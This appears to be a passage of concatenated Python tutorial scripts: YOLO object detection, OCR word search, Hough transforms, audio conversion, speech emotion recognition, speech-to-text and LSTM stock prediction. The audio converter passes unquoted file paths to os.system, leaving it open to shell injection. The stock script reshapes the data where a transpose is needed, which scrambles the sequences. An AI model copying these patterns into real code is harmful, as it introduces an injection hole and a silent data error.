cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
out.write(image)
cv2.imshow("image", image)
if ord("q") == cv2.waitKey(1):
break
cap.release()
cv2.destroyAllWindows()
import time
import torch
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
def boxes_iou(box1, box2):
"""
Returns the IOU between box1 and box2 (i.e intersection area divided by union area)
"""
# Get the Width and Height of each bounding box
width_box1 = box1[2]
height_box1 = box1[3]
width_box2 = box2[2]
height_box2 = box2[3]
# Calculate the area of the each bounding box
area_box1 = width_box1 * height_box1
area_box2 = width_box2 * height_box2
# Find the vertical edges of the union of the two bounding boxes
mx = min(box1[0] - width_box1/2.0, box2[0] - width_box2/2.0)
Mx = max(box1[0] + width_box1/2.0, box2[0] + width_box2/2.0)
# Calculate the width of the union of the two bounding boxes
union_width = Mx - mx
# Find the horizontal edges of the union of the two bounding boxes
my = min(box1[1] - height_box1/2.0, box2[1] - height_box2/2.0)
My = max(box1[1] + height_box1/2.0, box2[1] + height_box2/2.0)
# Calculate the height of the union of the two bounding boxes
union_height = My - my
# Calculate the width and height of the area of intersection of the two bounding boxes
intersection_width = width_box1 + width_box2 - union_width
intersection_height = height_box1 + height_box2 - union_height
# If the the boxes don't overlap then their IOU is zero
if intersection_width <= 0 or intersection_height <= 0:
return 0.0
# Calculate the area of intersection of the two bounding boxes
intersection_area = intersection_width * intersection_height
# Calculate the area of the union of the two bounding boxes
union_area = area_box1 + area_box2 - intersection_area
# Calculate the IOU
iou = intersection_area/union_area
return iou
def nms(boxes, iou_thresh):
"""
Performs Non maximal suppression technique to boxes using iou_thresh threshold
"""
# print(boxes.shape)
# If there are no bounding boxes do nothing
if len(boxes) == 0:
return boxes
# Create a PyTorch Tensor to keep track of the detection confidence
# of each predicted bounding box
det_confs = torch.zeros(len(boxes))
# Get the detection confidence of each predicted bounding box
for i in range(len(boxes)):
det_confs[i] = boxes[i][4]
# Sort the indices of the bounding boxes by detection confidence value in descending order.
# We ignore the first returned element since we are only interested in the sorted indices
_,sortIds = torch.sort(det_confs, descending = True)
# Create an empty list to hold the best bounding boxes after
# Non-Maximal Suppression (NMS) is performed
best_boxes = []
# Perform Non-Maximal Suppression
for i in range(len(boxes)):
# Get the bounding box with the highest detection confidence first
box_i = boxes[sortIds[i]]
# Check that the detection confidence is not zero
if box_i[4] > 0:
# Save the bounding box
best_boxes.append(box_i)
# Go through the rest of the bounding boxes in the list and calculate their IOU with
# respect to the previous selected box_i.
for j in range(i + 1, len(boxes)):
box_j = boxes[sortIds[j]]
# If the IOU of box_i and box_j is higher than the given IOU threshold set
# box_j's detection confidence to zero.
if boxes_iou(box_i, box_j) > iou_thresh:
box_j[4] = 0
return best_boxes
def detect_objects(model, img, iou_thresh, nms_thresh):
# Start the time. This is done to calculate how long the detection takes.
start = time.time()
# Set the model to evaluation mode.
model.eval()
# Convert the image from a NumPy ndarray to a PyTorch Tensor of the correct shape.
# The image is transposed, then converted to a FloatTensor of dtype float32, then
# Normalized to values between 0 and 1, and finally unsqueezed to have the correct
# shape of 1 x 3 x 416 x 416
img = torch.from_numpy(img.transpose(2,0,1)).float().div(255.0).unsqueeze(0)
# Feed the image to the neural network with the corresponding NMS threshold.
# The first step in NMS is to remove all bounding boxes that have a very low
# probability of detection. All predicted bounding boxes with a value less than
# the given NMS threshold will be removed.
list_boxes = model(img, nms_thresh)
# Make a new list with all the bounding boxes returned by the neural network
boxes = list_boxes[0][0] + list_boxes[1][0] + list_boxes[2][0]
# Perform the second step of NMS on the bounding boxes returned by the neural network.
# In this step, we only keep the best bounding boxes by eliminating all the bounding boxes
# whose IOU value is higher than the given IOU threshold
boxes = nms(boxes, iou_thresh)
# Stop the time.
finish = time.time()
# Print the time it took to detect objects
print('\n\nIt took {:.3f}'.format(finish - start), 'seconds to detect the objects in the image.\n')
# Print the number of objects detected
print('Number of Objects Detected:', len(boxes), '\n')
return boxes
def load_class_names(namesfile):
# Create an empty list to hold the object classes
class_names = []
# Open the file containing the COCO object classes in read-only mode
with open(namesfile, 'r') as fp:
# The coco.names file contains only one object class per line.
# Read the file line by line and save all the lines in a list.
lines = fp.readlines()
# Get the object class names
for line in lines:
# Make a copy of each line with any trailing whitespace removed
line = line.rstrip()
# Save the object class name into class_names
class_names.append(line)
return class_names
def print_objects(boxes, class_names):
print('Objects Found and Confidence Level:\n')
for i in range(len(boxes)):
box = boxes[i]
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%i. %s: %f' % (i + 1, class_names[cls_id], cls_conf))
def plot_boxes(img, boxes, class_names, plot_labels, color = None):
# Define a tensor used to set the colors of the bounding boxes
colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]])
# Define a function to set the colors of the bounding boxes
def get_color(c, x, max_val):
ratio = float(x) / max_val * 5
i = int(np.floor(ratio))
j = int(np.ceil(ratio))
ratio = ratio - i
r = (1 - ratio) * colors[i][c] + ratio * colors[j][c]
return int(r * 255)
# Get the width and height of the image
width = img.shape[1]
height = img.shape[0]
# Create a figure and plot the image
fig, a = plt.subplots(1,1)
a.imshow(img)
# Plot the bounding boxes and corresponding labels on top of the image
for i in range(len(boxes)):
# Get the ith bounding box
box = boxes[i]
# Get the (x,y) pixel coordinates of the lower-left and lower-right corners
# of the bounding box relative to the size of the image.
x1 = int(np.around((box[0] - box[2]/2.0) * width))
y1 = int(np.around((box[1] - box[3]/2.0) * height))
x2 = int(np.around((box[0] + box[2]/2.0) * width))
y2 = int(np.around((box[1] + box[3]/2.0) * height))
# Set the default rgb value to red
rgb = (1, 0, 0)
# Use the same color to plot the bounding boxes of the same object class
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
classes = len(class_names)
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes) / 255
green = get_color(1, offset, classes) / 255
blue = get_color(0, offset, classes) / 255
# If a color is given then set rgb to the given color instead
if color is None:
rgb = (red, green, blue)
else:
rgb = color
# Calculate the width and height of the bounding box relative to the size of the image.
width_x = x2 - x1
width_y = y1 - y2
# Set the postion and size of the bounding box. (x1, y2) is the pixel coordinate of the
# lower-left corner of the bounding box relative to the size of the image.
rect = patches.Rectangle((x1, y2),
width_x, width_y,
linewidth = 2,
edgecolor = rgb,
facecolor = 'none')
# Draw the bounding box on top of the image
a.add_patch(rect)
# If plot_labels = True then plot the corresponding label
if plot_labels:
# Create a string with the object class name and the corresponding object class probability
conf_tx = class_names[cls_id] + ': {:.1f}'.format(cls_conf)
# Define x and y offsets for the labels
lxc = (img.shape[1] * 0.266) / 100
lyc = (img.shape[0] * 1.180) / 100
# Draw the labels on top of the image
a.text(x1 + lxc, y1 - lyc, conf_tx, fontsize = 12, color = 'k',
bbox = dict(facecolor = rgb, edgecolor = rgb, alpha = 0.6))
plt.savefig("output.jpg")
plt.show()
import cv2
import matplotlib.pyplot as plt
from utils import *
from darknet import Darknet
# Set the NMS Threshold
score_threshold = 0.6
# Set the IoU threshold
iou_threshold = 0.4
cfg_file = "cfg/yolov3.cfg"
weight_file = "weights/yolov3.weights"
namesfile = "data/coco.names"
m = Darknet(cfg_file)
m.load_weights(weight_file)
class_names = load_class_names(namesfile)
# m.print_network()
original_image = cv2.imread("images/city_scene.jpg")
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
img = cv2.resize(original_image, (m.width, m.height))
# detect the objects
boxes = detect_objects(m, img, iou_threshold, score_threshold)
print(boxes[0])
print(boxes[1])
print(boxes[2])
# plot the image with the bounding boxes and corresponding object class labels
plot_boxes(original_image, boxes, class_names, plot_labels=True)
import cv2
import numpy as np
import time
import sys
import os
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
# the neural network configuration
config_path = "cfg/yolov3.cfg"
# the YOLO net weights file
weights_path = "weights/yolov3.weights"
# loading all the class labels (objects)
labels = open("data/coco.names").read().strip().split("\n")
# generating colors for each object for later plotting
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
# load the YOLO network
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
# path_name = "images/city_scene.jpg"
path_name = sys.argv[1]
image = cv2.imread(path_name)
file_name = os.path.basename(path_name)
filename, ext = file_name.split(".")
h, w = image.shape[:2]
# create 4D blob
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
# sets the blob as the input of the network
net.setInput(blob)
# get all the layer names
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
# feed forward (inference) and get the network output
# measure how much it took in seconds
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print(f"Time took: {time_took:.2f}s")
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top and
# and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
# cv2.imshow("image", image)
# if cv2.waitKey(0) == ord("q"):
# pass
cv2.imwrite(filename + "_yolo3." + ext, image)
import pytesseract
import cv2
import sys
import matplotlib.pyplot as plt
from PIL import Image
# read the image using OpenCV
image = cv2.imread(sys.argv[1])
# make a copy of this image to draw in
image_copy = image.copy()
# the target word to search for
target_word = sys.argv[2]
# get all data from the image
data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)
# get all occurences of the that word
word_occurences = [ i for i, word in enumerate(data["text"]) if word.lower() == target_word ]
for occ in word_occurences:
# extract the width, height, top and left position for that detected word
w = data["width"][occ]
h = data["height"][occ]
l = data["left"][occ]
t = data["top"][occ]
# define all the surrounding box points
p1 = (l, t)
p2 = (l + w, t)
p3 = (l + w, t + h)
p4 = (l, t + h)
# draw the 4 lines (rectangular)
image_copy = cv2.line(image_copy, p1, p2, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p2, p3, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p3, p4, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p4, p1, color=(255, 0, 0), thickness=2)
plt.imsave("all_dog_words.png", image_copy)
plt.imshow(image_copy)
plt.show()
import pytesseract
import cv2
import matplotlib.pyplot as plt
import sys
from PIL import Image
# read the image using OpenCV
# from the command line first argument
image = cv2.imread(sys.argv[1])
# or you can use Pillow
# image = Image.open(sys.argv[1])
# get the string
string = pytesseract.image_to_string(image)
# print it
print(string)
# get all data
# data = pytesseract.image_to_data(image)
# print(data)
import pytesseract
import cv2
import matplotlib.pyplot as plt
from PIL import Image
# the target word to search for
target_word = "your"
cap = cv2.VideoCapture(0)
while True:
# read the image from the cam
_, image = cap.read()
# make a copy of this image to draw in
image_copy = image.copy()
# get all data from the image
data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)
# print the data
print(data["text"])
# get all occurences of the that word
word_occurences = [ i for i, word in enumerate(data["text"]) if word.lower() == target_word ]
for occ in word_occurences:
# extract the width, height, top and left position for that detected word
w = data["width"][occ]
h = data["height"][occ]
l = data["left"][occ]
t = data["top"][occ]
# define all the surrounding box points
p1 = (l, t)
p2 = (l + w, t)
p3 = (l + w, t + h)
p4 = (l, t + h)
# draw the 4 lines (rectangular)
image_copy = cv2.line(image_copy, p1, p2, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p2, p3, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p3, p4, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p4, p1, color=(255, 0, 0), thickness=2)
if cv2.waitKey(1) == ord("q"):
break
cv2.imshow("image_copy", image_copy)
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# load the image
img = cv2.imread(sys.argv[1])
# convert BGR to RGB to be suitable for showing using matplotlib library
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# make a copy of the original image
cimg = img.copy()
# convert image to grayscale
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# apply a blur using the median filter
img = cv2.medianBlur(img, 5)
# finds the circles in the grayscale image using the Hough transform
circles = cv2.HoughCircles(image=img, method=cv2.HOUGH_GRADIENT, dp=0.9,
minDist=80, param1=110, param2=39, maxRadius=70)
for co, i in enumerate(circles[0, :], start=1):
# draw the outer circle in green
cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle in red
cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)
# print the number of circles detected
print("Number of circles detected:", co)
# save the image, convert to BGR to save with proper colors
# cv2.imwrite("coins_circles_detected.png", cimg)
# show the image
plt.imshow(cimg)
plt.show()
import numpy as np
import matplotlib.pyplot as plt
import cv2
cap = cv2.VideoCapture(0)
while True:
_, image = cap.read()
# convert to grayscale
grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# perform edge detection
edges = cv2.Canny(grayscale, 30, 100)
# detect lines in the image using hough lines technique
lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, np.array([]), 50, 5)
# iterate over the output lines and draw them
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(image, (x1, y1), (x2, y2), (255, 0, 0), 3)
cv2.line(edges, (x1, y1), (x2, y2), (255, 0, 0), 3)
# show images
cv2.imshow("image", image)
cv2.imshow("edges", edges)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import numpy as np
import matplotlib.pyplot as plt
import cv2
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to grayscale
grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# perform edge detection
edges = cv2.Canny(grayscale, 30, 100)
# detect lines in the image using hough lines technique
lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, np.array([]), 50, 5)
# iterate over the output lines and draw them
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(image, (x1, y1), (x2, y2), color=(20, 220, 20), thickness=3)
# show the image
plt.imshow(image)
plt.show()
"""
A utility script used for converting audio samples to be
suitable for feature extraction
"""
import os
def convert_audio(audio_path, target_path, remove=False):
"""This function sets the audio audio_path to:
- 16000Hz Sampling rate
- one audio channel ( mono )
Params:
audio_path (str): the path of audio wav file you want to convert
target_path (str): target path to save your new converted wav file
remove (bool): whether to remove the old file after converting
Note that this function requires ffmpeg installed in your system."""
os.system(f"ffmpeg -i {audio_path} -ac 1 -ar 16000 {target_path}")
# os.system(f"ffmpeg -i {audio_path} -ac 1 {target_path}")
if remove:
os.remove(audio_path)
def convert_audios(path, target_path, remove=False):
"""Converts a path of wav files to:
- 16000Hz Sampling rate
- one audio channel ( mono )
and then put them into a new folder called target_path
Params:
audio_path (str): the path of audio wav file you want to convert
target_path (str): target path to save your new converted wav file
remove (bool): whether to remove the old file after converting
Note that this function requires ffmpeg installed in your system."""
for dirpath, dirnames, filenames in os.walk(path):
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
target_dir = dirname.replace(path, target_path)
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
for dirpath, _, filenames in os.walk(path):
for filename in filenames:
file = os.path.join(dirpath, filename)
if file.endswith(".wav"):
# it is a wav file
target_file = file.replace(path, target_path)
convert_audio(file, target_file, remove=remove)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="""Convert ( compress ) wav files to 16MHz and mono audio channel ( 1 channel )
This utility helps for compressing wav files for training and testing""")
parser.add_argument("audio_path", help="Folder that contains wav files you want to convert")
parser.add_argument("target_path", help="Folder to save new wav files")
parser.add_argument("-r", "--remove", type=bool, help="Whether to remove the old wav file after converting", default=False)
args = parser.parse_args()
audio_path = args.audio_path
target_path = args.target_path
if os.path.isdir(audio_path):
if not os.path.isdir(target_path):
os.makedirs(target_path)
convert_audios(audio_path, target_path, remove=args.remove)
elif os.path.isfile(audio_path) and audio_path.endswith(".wav"):
if not target_path.endswith(".wav"):
target_path += ".wav"
convert_audio(audio_path, target_path, remove=args.remove)
else:
raise TypeError("The audio_path file you specified isn't appropriate for this operation")
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score
from utils import load_data
import os
import pickle
# load RAVDESS dataset
X_train, X_test, y_train, y_test = load_data(test_size=0.25)
# print some details
# number of samples in training data
print("[+] Number of training samples:", X_train.shape[0])
# number of samples in testing data
print("[+] Number of testing samples:", X_test.shape[0])
# number of features used
# this is a vector of features extracted
# using utils.extract_features() method
print("[+] Number of features:", X_train.shape[1])
# best model, determined by a grid search
model_params = {
'alpha': 0.01,
'batch_size': 256,
'epsilon': 1e-08,
'hidden_layer_sizes': (300,),
'learning_rate': 'adaptive',
'max_iter': 500,
}
# initialize Multi Layer Perceptron classifier
# with best parameters ( so far )
model = MLPClassifier(**model_params)
# train the model
print("[*] Training the model...")
model.fit(X_train, y_train)
# predict 25% of data to measure how good we are
y_pred = model.predict(X_test)
# calculate the accuracy
accuracy = accuracy_score(y_true=y_test, y_pred=y_pred)
print("Accuracy: {:.2f}%".format(accuracy*100))
# now we save the model
# make result directory if doesn't exist yet
if not os.path.isdir("result"):
os.mkdir("result")
pickle.dump(model, open("result/mlp_classifier.model", "wb"))
import pyaudio
import os
import wave
import pickle
from sys import byteorder
from array import array
from struct import pack
from sklearn.neural_network import MLPClassifier
from utils import extract_feature
THRESHOLD = 500
CHUNK_SIZE = 1024
FORMAT = pyaudio.paInt16
RATE = 16000
SILENCE = 30
def is_silent(snd_data):
"Returns 'True' if below the 'silent' threshold"
return max(snd_data) < THRESHOLD
def normalize(snd_data):
"Average the volume out"
MAXIMUM = 16384
times = float(MAXIMUM)/max(abs(i) for i in snd_data)
r = array('h')
for i in snd_data:
r.append(int(i*times))
return r
def trim(snd_data):
"Trim the blank spots at the start and end"
def _trim(snd_data):
snd_started = False
r = array('h')
for i in snd_data:
if not snd_started and abs(i)>THRESHOLD:
snd_started = True
r.append(i)
elif snd_started:
r.append(i)
return r
# Trim to the left
snd_data = _trim(snd_data)
# Trim to the right
snd_data.reverse()
snd_data = _trim(snd_data)
snd_data.reverse()
return snd_data
def add_silence(snd_data, seconds):
"Add silence to the start and end of 'snd_data' of length 'seconds' (float)"
r = array('h', [0 for i in range(int(seconds*RATE))])
r.extend(snd_data)
r.extend([0 for i in range(int(seconds*RATE))])
return r
def record():
"""
Record a word or words from the microphone and
return the data as an array of signed shorts.
Normalizes the audio, trims silence from the
start and end, and pads with 0.5 seconds of
blank sound to make sure VLC et al can play
it without getting chopped off.
"""
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT, channels=1, rate=RATE,
input=True, output=True,
frames_per_buffer=CHUNK_SIZE)
num_silent = 0
snd_started = False
r = array('h')
while 1:
# little endian, signed short
snd_data = array('h', stream.read(CHUNK_SIZE))
if byteorder == 'big':
snd_data.byteswap()
r.extend(snd_data)
silent = is_silent(snd_data)
if silent and snd_started:
num_silent += 1
elif not silent and not snd_started:
snd_started = True
if snd_started and num_silent > SILENCE:
break
sample_width = p.get_sample_size(FORMAT)
stream.stop_stream()
stream.close()
p.terminate()
r = normalize(r)
r = trim(r)
r = add_silence(r, 0.5)
return sample_width, r
def record_to_file(path):
"Records from the microphone and outputs the resulting data to 'path'"
sample_width, data = record()
data = pack('<' + ('h'*len(data)), *data)
wf = wave.open(path, 'wb')
wf.setnchannels(1)
wf.setsampwidth(sample_width)
wf.setframerate(RATE)
wf.writeframes(data)
wf.close()
if __name__ == "__main__":
# load the saved model (after training)
model = pickle.load(open("result/mlp_classifier.model", "rb"))
print("Please talk")
filename = "test.wav"
# record the file (start talking)
record_to_file(filename)
# extract features and reshape it
features = extract_feature(filename, mfcc=True, chroma=True, mel=True).reshape(1, -1)
# predict
result = model.predict(features)[0]
# show the result !
print("result:", result)
import soundfile
import numpy as np
import librosa
import glob
import os
from sklearn.model_selection import train_test_split
# all emotions on RAVDESS dataset
int2emotion = {
"01": "neutral",
"02": "calm",
"03": "happy",
"04": "sad",
"05": "angry",
"06": "fearful",
"07": "disgust",
"08": "surprised"
}
# we allow only these emotions
AVAILABLE_EMOTIONS = {
"angry",
"sad",
"neutral",
"happy"
}
def extract_feature(file_name, **kwargs):
"""
Extract feature from audio file file_name
Features supported:
- MFCC (mfcc)
- Chroma (chroma)
- MEL Spectrogram Frequency (mel)
- Contrast (contrast)
- Tonnetz (tonnetz)
e.g:
features = extract_feature(path, mel=True, mfcc=True)
"""
mfcc = kwargs.get("mfcc")
chroma = kwargs.get("chroma")
mel = kwargs.get("mel")
contrast = kwargs.get("contrast")
tonnetz = kwargs.get("tonnetz")
with soundfile.SoundFile(file_name) as sound_file:
X = sound_file.read(dtype="float32")
sample_rate = sound_file.samplerate
if chroma or contrast:
stft = np.abs(librosa.stft(X))
result = np.array([])
if mfcc:
mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T, axis=0)
result = np.hstack((result, mfccs))
if chroma:
chroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)
result = np.hstack((result, chroma))
if mel:
mel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)
result = np.hstack((result, mel))
if contrast:
contrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate).T,axis=0)
result = np.hstack((result, contrast))
if tonnetz:
tonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X), sr=sample_rate).T,axis=0)
result = np.hstack((result, tonnetz))
return result
def load_data(test_size=0.2):
X, y = [], []
for file in glob.glob("data/Actor_*/*.wav"):
# get the base name of the audio file
basename = os.path.basename(file)
# get the emotion label
emotion = int2emotion[basename.split("-")[2]]
# we allow only AVAILABLE_EMOTIONS we set
if emotion not in AVAILABLE_EMOTIONS:
continue
# extract speech features
features = extract_feature(file, mfcc=True, chroma=True, mel=True)
# add to data
X.append(features)
y.append(emotion)
# split the data to training and testing and return it
return train_test_split(np.array(X), y, test_size=test_size, random_state=7)
import speech_recognition as sr
import sys
duration = int(sys.argv[1])
# initialize the recognizer
r = sr.Recognizer()
print("Please talk")
with sr.Microphone() as source:
# read the audio data from the default microphone
audio_data = r.record(source, duration=duration)
print("Recognizing...")
# convert speech to text
text = r.recognize_google(audio_data)
print(text)
import speech_recognition as sr
import sys
filename = sys.argv[1]
# initialize the recognizer
r = sr.Recognizer()
# open the file
with sr.AudioFile(filename) as source:
# listen for the data (load audio to memory)
audio_data = r.record(source)
# recognize (convert from speech to text)
text = r.recognize_google(audio_data)
print(text)
import os
import time
from tensorflow.keras.layers import LSTM
# Window size or the sequence length
N_STEPS = 100
# Lookup step, 1 is the next day
LOOKUP_STEP = 90
# test ratio size, 0.2 is 20%
TEST_SIZE = 0.2
# features to use
FEATURE_COLUMNS = ["adjclose", "volume", "open", "high", "low"]
# date now
date_now = time.strftime("%Y-%m-%d")
### model parameters
N_LAYERS = 3
# LSTM cell
CELL = LSTM
# 256 LSTM neurons
UNITS = 256
# 40% dropout
DROPOUT = 0.4
### training parameters
# mean squared error loss
LOSS = "mse"
OPTIMIZER = "rmsprop"
BATCH_SIZE = 64
EPOCHS = 300
# Apple stock market
ticker = "AAPL"
ticker_data_filename = os.path.join("data", f"{ticker}_{date_now}.csv")
# model name to save
model_name = f"{date_now}_{ticker}-{LOSS}-{CELL.__name__}-seq-{N_STEPS}-step-{LOOKUP_STEP}-layers-{N_LAYERS}-units-{UNITS}"
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from yahoo_fin import stock_info as si
from collections import deque
import numpy as np
import pandas as pd
import random
def load_data(ticker, n_steps=50, scale=True, shuffle=True, lookup_step=1,
test_size=0.2, feature_columns=['adjclose', 'volume', 'open', 'high', 'low']):
"""
Loads data from Yahoo Finance source, as well as scaling, shuffling, normalizing and splitting.
Params:
ticker (str/pd.DataFrame): the ticker you want to load, examples include AAPL, TESL, etc.
n_steps (int): the historical sequence length (i.e window size) used to predict, default is 50
scale (bool): whether to scale prices from 0 to 1, default is True
shuffle (bool): whether to shuffle the data, default is True
lookup_step (int): the future lookup step to predict, default is 1 (e.g next day)
test_size (float): ratio for test data, default is 0.2 (20% testing data)
feature_columns (list): the list of features to use to feed into the model, default is everything grabbed from yahoo_fin
"""
# see if ticker is already a loaded stock from yahoo finance
if isinstance(ticker, str):
# load it from yahoo_fin library
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
# already loaded, use it directly
df = ticker
else:
raise TypeError("ticker can be either a str or a pd.DataFrame instances")
# this will contain all the elements we want to return from this function
result = {}
# we will also return the original dataframe itself
result['df'] = df.copy()
# make sure that the passed feature_columns exist in the dataframe
for col in feature_columns:
assert col in df.columns
if scale:
column_scaler = {}
# scale the data (prices) from 0 to 1
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# add the MinMaxScaler instances to the result returned
result["column_scaler"] = column_scaler
# add the target column (label) by shifting by lookup_step
df['future'] = df['adjclose'].shift(-lookup_step)
# last lookup_step columns contains NaN in future column
# get them before droping NaNs
last_sequence = np.array(df[feature_columns].tail(lookup_step))
# drop NaNs
df.dropna(inplace=True)
sequence_data = []
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df['future'].values):
sequences.append(entry)
if len(sequences) == n_steps:
sequence_data.append([np.array(sequences), target])
# get the last sequence by appending the last n_step sequence with lookup_step sequence
# for instance, if n_steps=50 and lookup_step=10, last_sequence should be of 59 (that is 50+10-1) length
# this last_sequence will be used to predict in future dates that are not available in the dataset
last_sequence = list(sequences) + list(last_sequence)
# shift the last sequence by -1
last_sequence = np.array(pd.DataFrame(last_sequence).shift(-1).dropna())
# add to result
result['last_sequence'] = last_sequence
# construct the X's and y's
X, y = [], []
for seq, target in sequence_data:
X.append(seq)
y.append(target)
# convert to numpy arrays
X = np.array(X)
y = np.array(y)
# reshape X to fit the neural network
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# split the dataset
result["X_train"], result["X_test"], result["y_train"], result["y_test"] = train_test_split(X, y,
test_size=test_size, shuffle=shuffle)
# return the result
return result
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3,
loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
elif i == n_layers - 1:
# last layer
model.add(cell(units, return_sequences=False))
else:
# hidden layers
model.add(cell(units, return_sequences=True))
# add dropout after each layer
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
from stock_prediction import create_model, load_data, np
from parameters import *
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
def plot_graph(model, data):
y_test = data["y_test"]
X_test = data["X_test"]
y_pred = model.predict(X_test)
y_test = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(np.expand_dims(y_test, axis=0)))
y_pred = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(y_pred))
plt.plot(y_test[-200:], c='b')
plt.plot(y_pred[-200:], c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def get_accuracy(model, data):
y_test = data["y_test"]
X_test = data["X_test"]
y_pred = model.predict(X_test)
y_test = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(np.expand_dims(y_test, axis=0)))
y_pred = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(y_pred))
y_pred = list(map(lambda current, future: int(float(future) > float(current)), y_test[:-LOOKUP_STEP], y_pred[LOOKUP_STEP:]))
